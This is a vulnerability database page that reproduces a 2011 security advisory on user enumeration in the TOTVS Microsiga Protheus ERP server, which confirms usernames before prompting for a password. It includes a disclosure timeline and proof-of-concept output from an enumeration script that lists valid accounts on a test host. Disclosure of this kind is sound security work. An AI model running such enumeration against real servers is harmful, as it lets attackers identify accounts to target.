Vulners
Lucene search
TOTVS ERP Microsiga Protheus User Enumeration
🗓️ 04 Mar 2011 00:00:00Reported by Flavio do Carmo JuniorType 
packetstorm🔗 packetstormsecurity.com👁 54 Views
`[DCA-2011-0002]
[Discussion]
- DcLabs Security Research Group advises about following vulnerability(ies):
[Software]
- TOTVS ERP Microsiga Protheus
[Vendor Product Description - Portuguese]
- Software de Gestão - TOTVS
A TOTVS é uma empresa de software, inovação, relacionamento e suporte
à gestão, líder absoluta no Brasil, com 49,1% de share de mercado, e
também na América Latina, com 31,2%*, é a maior empresa de softwares
aplicativos sediada em países emergentes e a 7ª maior do mundo no
setor.Tem mais de 25,2 mil clientes ativos, conta com o apoio de 9 mil
participantes e está presente em 23 países.
Proposta de Valor
Tornar a empresa mais competitiva, com maior velocidade de decisão,
oferecendo soluções que organizam, disciplinam, definem e impõem
processos, armazenam dados, geram informação e auxiliam a gestão.
- Fonte: http://totvs.com.br/web/guest/software
[Advisory Timeline]
- 02/Feb/2011 -> Initial contact to vendor, security contact request.
- 03/Feb/2011 -> Security contact response.
- 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.
- 04/Feb/2011 -> Vendor confirms notification received.
- 21/Feb/2011 -> Situation report requested.
- 01/Mar/2011 -> No vendor response.
- 02/Mar/2011 -> Advisory published.
[Bug Summary]
- Users enumeration
[Impact]
- Low
[Affected Version]
- Microsiga Protheus 8 (20081215030344)
- Microsiga Protheus 10 (20100812040605)
- Other versions can also be affected but weren't tested.
[Bug Description and Proof of Concept]
- The server validates the user before asking for a password, thus we
can keep trying usernames until we get a password prompt.
- A Proof of Concept has been created:
--- command line output begin ---
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
-h for help
options:
--version show program's version number and exit
-h, --help show this help message and exit
-i IPADDRESS, --ipaddress=IPADDRESS
Server IP address
-p PORT, --port=PORT Port number (defaults to 1234)
-t TARGET, --target=TARGET
Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
Defaults to 10
[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10
--ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
--- command line output end ---
----------------------------------------------------------------------------------------
All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br
[Workarounds]
- An initial workaround was provided to block user after 3 failed
password attempts, but it doesn't work against this kind of users
enumeration.
[Credits]
DcLabs Security Research Group.
--
--
Atenciosamente,
Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2011 00:00Current
7.4High risk
Vulners AI Score7.4